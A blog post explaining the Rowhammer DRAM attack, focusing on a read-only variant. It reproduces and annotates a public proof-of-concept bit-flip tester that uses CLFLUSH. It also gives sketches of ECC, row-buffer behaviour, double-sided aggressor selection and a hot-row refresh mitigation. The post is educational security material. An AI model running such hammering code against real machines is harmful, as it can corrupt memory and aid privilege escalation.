tminusplus

Bring on the Rowhammer

As dynamic random-access memory (DRAM) modules have become smaller and more densely packed, an attack vector has appeared that breaks an assumption we rely on throughout software development: that the only way to change a piece of memory is to write to it directly.

By rapidly and repeatedly toggling memory in the right location, you can cause memory in another location to change value. This can let you attack other processes on the machine and escalate to kernel privileges. It works because writing to memory dumps electrical charge into a cell, and a small amount of that charge leaks into neighboring cells. The insulation between the cells is not enough to prevent this disturbance, and even error-correcting code memory (ECC memory) typically only corrects a single flipped bit and detects two flipped bits per protected word, so more simultaneous flips can still slip through.
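To make the ECC limitation concrete, here is a minimal sketch of a single-error-correcting, double-error-detecting (SECDED) code. It is a toy extended Hamming (8,4) code over 4 data bits, not the wider code used on real ECC modules, and the names secded_encode, secded_decode and ecc_status are made up for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical status codes for this toy decoder. */
enum ecc_status { ECC_OK, ECC_CORRECTED, ECC_DOUBLE_ERROR };

static unsigned bit(uint8_t w, int i) { return (w >> i) & 1u; }

/* Encode the low 4 bits of data into an 8-bit codeword.
   Codeword bit i (1..7) is Hamming position i; bit 0 is overall parity. */
uint8_t secded_encode(uint8_t data) {
    unsigned d1 = bit(data, 0), d2 = bit(data, 1);
    unsigned d3 = bit(data, 2), d4 = bit(data, 3);
    unsigned p1 = d1 ^ d2 ^ d4; /* covers positions 1, 3, 5, 7 */
    unsigned p2 = d1 ^ d3 ^ d4; /* covers positions 2, 3, 6, 7 */
    unsigned p4 = d2 ^ d3 ^ d4; /* covers positions 4, 5, 6, 7 */
    uint8_t cw = (uint8_t) ((p1 << 1) | (p2 << 2) | (d1 << 3) | (p4 << 4) |
                            (d2 << 5) | (d3 << 6) | (d4 << 7));
    unsigned overall = 0;
    for (int i = 1; i < 8; i++)
        overall ^= bit(cw, i);
    return (uint8_t) (cw | overall);
}

/* Decode a codeword. Corrects one flipped bit, detects two flipped bits.
   Three or more flips can be silently "corrected" into the wrong data. */
enum ecc_status secded_decode(uint8_t cw, uint8_t *data_out) {
    assert(data_out != NULL);
    unsigned syndrome = 0, overall = 0;
    for (int i = 0; i < 8; i++) {
        if (bit(cw, i)) {
            syndrome ^= (unsigned) i; /* XOR of the positions of set bits */
            overall ^= 1u;            /* parity across all 8 bits */
        }
    }
    enum ecc_status status = ECC_OK;
    if (overall) {
        /* Odd number of flips: assume exactly one and flip it back.
           A syndrome of 0 means the overall parity bit itself flipped. */
        cw ^= (uint8_t) (1u << syndrome);
        status = ECC_CORRECTED;
    } else if (syndrome != 0) {
        /* Even number of flips with a non-zero syndrome: uncorrectable. */
        return ECC_DOUBLE_ERROR;
    }
    *data_out = (uint8_t) (bit(cw, 3) | (bit(cw, 5) << 1) |
                           (bit(cw, 6) << 2) | (bit(cw, 7) << 3));
    return status;
}
```

Flipping one bit of secded_encode(0xA) decodes back to 0xA with ECC_CORRECTED, and flipping two bits returns ECC_DOUBLE_ERROR. Flipping three bits (for example bits 1, 2 and 4) is reported as ECC_CORRECTED while returning the wrong data, which is the case that matters for Rowhammer.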

Traditionally this attack was proposed by writing to memory, but today we’ll take a deep dive into how you can reproduce this by reading memory and why that works.

Readhammer

We’re going to take a peek at a practical DRAM Rowhammer exploit found by Mark Seaborn and Thomas Dullien. Take a quick read of the warning on the repository before running the Rowhammer tests. It may cause your computer to halt and catch fire if it manages to flip the right bit.

The rowhammer_test will allocate 1 GB of memory, pick eight random memory addresses, repeatedly read those addresses and then flush them from the CPU cache so that the next read goes back to DRAM. The surprising part is that we never write to the bits we are trying to flip, as a traditional Rowhammer attack would. We only read.

The core of the program is as follows, with my added comments. The trick in this code is to clear the CPU cache of the values we are reading by using the x86 instruction CLFLUSH in toggle(..). This ensures we read the memory from DRAM instead of the CPU cache.

const size_t mem_size = 1 << 30;
const int toggles = 540000;
 
void main_prog() {
  /* Allocate 1 GB (mem_size) of memory */
  g_mem = (char *) mmap(NULL, mem_size, PROT_READ | PROT_WRITE,
                        MAP_ANON | MAP_PRIVATE, -1, 0);
  assert(g_mem != MAP_FAILED);
 
  /* Set all bits to 1 in our alloc'd memory, which allows us to detect if a
     bit flipped by looking for a bit not set to 1.
 
     Perhaps this also allows for greater voltage fluctuation, since every bit
     must be refreshed. */
  printf("clear\n");
  memset(g_mem, 0xff, mem_size);
 
  Timer t;
  int iter = 0;
  for (;;) {
    printf("Iteration %i (after %.2fs)\n", iter++, t.get_diff());
 
    /* Function below, read 8 random addresses 540000 (toggles) times
       and repeat this 10 times */
    toggle(10, 8);
 
    Timer check_timer;
    uint64_t *end = (uint64_t *) (g_mem + mem_size);
    uint64_t *ptr;
    int errors = 0;
    for (ptr = (uint64_t *) g_mem; ptr < end; ptr++) {
      uint64_t got = *ptr;
      /* Check if there was a bit flip by looking for a bit
         not set to 1 in our alloc'd memory */
      if (got != ~(uint64_t) 0) {
        printf("error at %p: got 0x%" PRIx64 "\n", ptr, got);
        errors++;
      }
    }
    printf("  Checking for bit flips took %f sec\n", check_timer.get_diff());
    if (errors)
      exit(1);
  }
}
 
static void toggle(int iterations, int addr_count) {
  Timer timer;
  for (int j = 0; j < iterations; j++) {
    /* Pick the 8 random addresses */
    uint32_t *addrs[addr_count];
    for (int a = 0; a < addr_count; a++)
      addrs[a] = (uint32_t *) pick_addr();
 
    /* Read the 8 random addresses 540000 (toggles) times */
    uint32_t sum = 0;
    for (int i = 0; i < toggles; i++) {
      for (int a = 0; a < addr_count; a++)
        sum += *addrs[a] + 1;
      for (int a = 0; a < addr_count; a++)
        /* Flush the read memory from our cache using an x86 specific instruction */
        asm volatile("clflush (%0)" : : "r" (addrs[a]) : "memory");
    }
 
    // Sanity check. We don't expect this to fail, because reading
    // these rows refreshes them.
    if (sum != 0) {
      printf("error: sum=%x\n", sum);
      exit(1);
    }
  }
}
 
/* Pick a random memory address */
char *pick_addr() {
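  /* Cast before shifting: rand() returns an int, and shifting a large
     int left by 12 can overflow. The shift keeps addresses 4 KB aligned. */
  size_t offset = ((size_t) rand() << 12) % mem_size;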
  return g_mem + offset;
}
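The sanity check on sum is easy to miss: every word was set to 0xffffffff, so *addr + 1 wraps around to 0 in 32-bit unsigned arithmetic, and the sum stays 0 unless one of the words we read has changed. A minimal sketch of the same read-and-flush loop, written with the _mm_clflush intrinsic from <emmintrin.h> instead of inline assembly, might look like the following. The function name hammer_reads and the FLUSH_LINE macro are my own, and the non-x86 fallback is a do-nothing placeholder that will not hammer anything.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#if defined(__x86_64__)
#include <emmintrin.h> /* _mm_clflush */
#define FLUSH_LINE(p) _mm_clflush(p)
#else
/* Placeholder only: other architectures need their own cache flush. */
#define FLUSH_LINE(p) ((void) (p))
#endif

/* Read each address `toggles` times, flushing it from the cache after
   every round so the next read has to go back to DRAM.
   Returns 0 if every word read was 0xffffffff each time. */
uint32_t hammer_reads(uint32_t *const *addrs, size_t addr_count,
                      size_t toggles) {
    assert(addrs != NULL);
    uint32_t sum = 0;
    for (size_t i = 0; i < toggles; i++) {
        for (size_t a = 0; a < addr_count; a++) {
            /* volatile stops the compiler from hoisting the load out of
               the loop; 0xffffffff + 1 wraps to 0 */
            sum += *(volatile uint32_t *) addrs[a] + 1;
        }
        for (size_t a = 0; a < addr_count; a++)
            FLUSH_LINE(addrs[a]);
    }
    return sum;
}
```

Called with pointers into memory that was filled with 0xff, hammer_reads returns 0. If one of those words has lost a bit, each read adds a non-zero value and the result is non-zero.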

Now that we’ve seen the proof-of-concept code, we can start to break down how reading from DRAM can cause a bit flip in an adjacent memory cell.

   On destructive read                        After destructive read                                                                  
   ──────────────●───────────── Word line     ──────────────●───────────── Word line                                                  
   │             │                            │             │                                                                         
   │           1 ▼                            │           1 ▼
   │           ──┴── Transistor               │           ──┴── Transistor                                                            
   │           ─┬─┬─                          │           ─┬─┬─                                                                       
   │            │ │                           │            │ │                                                                        
   ●──────◀─────┘ └──◀───┐                    ●──────▶─────┘ └──▶───┐                                                                 
   │                   ──┴── Capacitor        │                   ──┴── Capacitor                                                     
   ▼   Charge dumped   ──┬──                  ▲    Capacitor      ──┬──                                                               
   │   onto bit line     ▽                    │    recharged        ▽                                                                 
   │                                          │                                                                                       
Bit line                                   Bit line                                                                                   

There are two separate wires, the bit line and the word line. The bit line carries the bit value out of the cell on a read and carries the value to store on a write. The use of the word line will become clear in the next picture. Note that the word line and bit line cross each other but are not connected, as signified by the lack of a circle at their intersection.

There are two components here, the transistor and the capacitor. The transistor connects the capacitor to the bit line when the word line has a value of 1. A value of 1 means a high voltage (1.8 V here; the exact level depends on the DRAM generation) whereas a value of 0 means a low voltage (~0 V). The capacitor stores the bit value and must discharge onto the bit line on a read, making it a destructive read.

This means that we must refresh the capacitor after every read to ensure it holds the same value as before the read. Separately, capacitors leak charge over time, so every cell in the DRAM module must also be refreshed periodically to keep it from losing its value.
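The periodic refresh also sets a deadline for an attacker: disturbance has to build up in a neighboring row before that row's next refresh restores it. As a rough back-of-the-envelope sketch, assuming a 64 ms refresh window and a row cycle time of about 50 ns (illustrative numbers that vary by module, not measurements from this post), we can bound how many times rows can be opened between refreshes. The function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Upper bound on row activations that fit in one refresh window,
   given the minimum time between two activations in the same bank. */
uint64_t max_activations_per_window(uint64_t refresh_window_ns,
                                    uint64_t row_cycle_ns) {
    assert(row_cycle_ns > 0);
    return refresh_window_ns / row_cycle_ns;
}

/* The same budget shared evenly between several rows that take turns. */
uint64_t activations_per_row(uint64_t refresh_window_ns,
                             uint64_t row_cycle_ns,
                             uint64_t rows_hammered) {
    assert(rows_hammered > 0);
    return max_activations_per_window(refresh_window_ns, row_cycle_ns) /
           rows_hammered;
}
```

With these assumed numbers, max_activations_per_window(64000000, 50) gives 1,280,000 activations in total, or 160,000 per row when eight rows in one bank take turns.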

We can zoom out of a single cell to the bigger picture of how a DRAM bank works below:

On destructive read                                                  After destructive read                                           
                                                                                                                                      
           Row                                                                  Row                                                   
           Decoder                                                              Decoder                                               
           ┌────┐                                                               ┌────┐                                                
           │    │ Word Lines ┌────────────┐                                     │    │ Word Lines ┌────────────┐                      
           │    ├────────────▶ ┌──────────┴─┐                                   │    ├────────────▶ ┌──────────┴─┐                    
Row  ──────▶    ├────────────▶ │            │                        Row  ──────▶    ├────────────▶ │            │                    
Addr ──────▶    ├────────────▶ │   Memory   │                        Addr ──────▶    ├────────────▶ │   Memory   │                    
           │    ├────────────▶ │   Array    │                                   │    ├────────────▶ │   Array    │                    
           │    │            └─┤            │                                   │    │            └─┤            │                    
           └────┘              └─┬──┬──┬──┬─┘                                   └────┘              └─▲──▲──▲──▲─┘                    
                                 │  │  │  │                                                           │  │  │  │                      
                            ┌────▼──▼──▼──▼────┐                                                 ┌────┴──┴──┴──┴────┐                 
                            │ Sense Amplifier  │ Sense bit line                                  │ Sense Amplifier  │ Refresh DRAM    
                            │                  │ and buffer it                                   │                  │ cells           
                            └────┬──┬──┬──┬────┘                                                 └────┬──┬──┬──┬────┘                 
                            ┌────▼──▼──▼──▼────┐                                                 ┌────┴──┴──┴──┴────┐                 
                            │    Row Buffer    │ Cache result of                                 │    Row Buffer    │                 
                            │                  │ entire row                                      │                  │                 
                            └────┬──┬──┬──┬────┘                                                 └────┬──┬──┬──┬────┘                 
                            ┌────▼──▼──▼──▼────┐                                                 ┌────┴──┴──┴──┴────┐                 
           Column ──────────▶  Column Decoder  │ Select part of                 Column ──────────┤  Column Decoder  │                 
           Addr   ──────────▶                  │ buffered row                   Addr   ──────────┤                  │                 
                            └────────┬─────────┘                                                 └────────┬─────────┘                 
                                     │ Output                                                             │                           
                                       (1 bit in this example)                                                                        

The word lines connect to a row decoder, which the memory controller uses on behalf of the CPU to select the row of DRAM to read. Selecting a row connects each cell in that row to its bit line, which causes the capacitors to discharge into the sense amplifier.

The sense amplifier detects whether each bit line is low or high and outputs that value into the row buffer. It also restores the value it read by dumping charge back into the capacitors. This is why we can use reads for a Rowhammer attack: every read that opens a row ends by pushing charge back into that row's cells, just as a write would.

The row buffer caches the bits of an entire row, which speeds up further reads from that row because we don't need to wait for the capacitors to discharge and then recharge. This is also why we must pick memory locations in different rows of the same bank (each bank has its own row buffer): if we kept reading the same row, the reads would be served from the row buffer and the row would never be opened and recharged again after the first read.
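A toy model makes the row buffer effect easy to see. The sketch below assumes a single bank that keeps the last row open until a different row is requested, and it ignores refresh and timing entirely. The function name count_row_activations is made up for this example.

```c
#include <assert.h>
#include <stddef.h>

#define NO_OPEN_ROW (-1)

/* Count how many times a row has to be opened (activated) to serve a
   sequence of reads, given one row buffer that holds the last row. */
size_t count_row_activations(const int *rows, size_t n) {
    assert(rows != NULL || n == 0);
    size_t activations = 0;
    int open_row = NO_OPEN_ROW;
    for (size_t i = 0; i < n; i++) {
        if (rows[i] != open_row) {
            /* Row buffer miss: the row is opened and its cells recharged */
            activations++;
            open_row = rows[i];
        }
        /* Row buffer hit: served from the buffer, the cells are untouched */
    }
    return activations;
}
```

Six reads of row 7 in a row cost a single activation in this model, while six reads alternating between rows 7 and 9 cost six. Only the second pattern keeps dumping charge into the cells.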

The final question is why dumping charge into DRAM cells sometimes causes other bits to flip. DRAM modules are scaling to smaller physical dimensions to fit more memory onto a single chip, and as the cells get closer together it becomes more difficult to prevent them from electrically interacting with each other.

You can imagine a scenario where we target a specific machine, work out how physical addresses map to DRAM rows, allocate a physically contiguous region of memory and then hammer the rows on both sides of a targeted row to make the attack more effective. This is dubbed double-sided Rowhammering.
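Real address mappings interleave channels, ranks and banks and often XOR address bits together, so the following is only a sketch under a simplifying assumption: that neighboring rows of the same bank sit a fixed number of bytes apart in physical address space. The row_stride parameter, the aggressor_pair type and the pick_aggressors function are all hypothetical and exist only for this illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Physical addresses in the rows on either side of a victim row. */
typedef struct {
    uint64_t lower;
    uint64_t upper;
    bool valid; /* false if a neighbor would fall outside the address range */
} aggressor_pair;

/* Assumes (hypothetically) that adding or subtracting row_stride bytes
   moves to the adjacent row of the same bank. */
aggressor_pair pick_aggressors(uint64_t victim_phys, uint64_t row_stride) {
    assert(row_stride > 0);
    aggressor_pair pair = {0, 0, false};
    if (victim_phys < row_stride || victim_phys > UINT64_MAX - row_stride)
        return pair;
    pair.lower = victim_phys - row_stride;
    pair.upper = victim_phys + row_stride;
    pair.valid = true;
    return pair;
}
```

With an assumed stride of 0x40000 bytes, a victim at physical address 0x100000 would be hammered from 0xC0000 and 0x140000. On a real machine the stride and mapping would have to be worked out for that specific memory controller and DIMM layout.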

Summary

We’ve been so focused on building fast and small computers that we’ve allowed holes to slip into the design of reliable hardware and, ultimately, software. One of the great challenges of this era is how to build reliable software, and that starts with reliable hardware. While Rowhammer is only one attack against one component in a computer, it is a signal that we should consider the security of a hardware design when trading off performance and size.

Two steps that help mitigate Rowhammer attacks are:

  1. Ship ECC memory in consumer devices to correct single-bit errors and detect double-bit errors
  2. Refresh rows located around hot rows with high numbers of reads/writes
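The second step can be sketched as a per-row activation counter. This is a simplified model, assuming one small bank and a fixed threshold, and is not how any particular memory controller implements it. The bank_guard type, its functions and NUM_ROWS are names invented for the example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define NUM_ROWS 16 /* toy bank size, chosen only for the example */

typedef struct {
    uint32_t activations[NUM_ROWS];        /* opens since the last reset */
    uint32_t neighbor_refreshes[NUM_ROWS]; /* extra refreshes issued per row */
    uint32_t threshold;                    /* opens that mark a row as hot */
} bank_guard;

void bank_guard_init(bank_guard *g, uint32_t threshold) {
    assert(g != NULL);
    for (size_t r = 0; r < NUM_ROWS; r++) {
        g->activations[r] = 0;
        g->neighbor_refreshes[r] = 0;
    }
    g->threshold = threshold;
}

/* Record one activation of `row`. Once a row reaches the threshold,
   refresh the rows on either side of it and reset its counter. */
void bank_guard_activate(bank_guard *g, size_t row) {
    assert(g != NULL);
    if (row >= NUM_ROWS)
        return;
    if (++g->activations[row] < g->threshold)
        return;
    g->activations[row] = 0;
    if (row > 0)
        g->neighbor_refreshes[row - 1]++;
    if (row + 1 < NUM_ROWS)
        g->neighbor_refreshes[row + 1]++;
}
```

With a threshold of 3, activating row 5 three times triggers one extra refresh of rows 4 and 6. A real design would also reset the counters on every regular refresh and would need a much cheaper way to track hot rows than one counter per row.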

Hope you learned something!

Real-World Attacks

Here are some interesting Rowhammer attacks I found while researching for this blog:

  1. GLitch - Rowhammer the memory in a mobile GPU by using JavaScript on a website
  2. Throwhammer - Rowhammer with network packets by using remote direct memory access (RDMA)
  3. DRAMMER - Rowhammer used to attack an Android device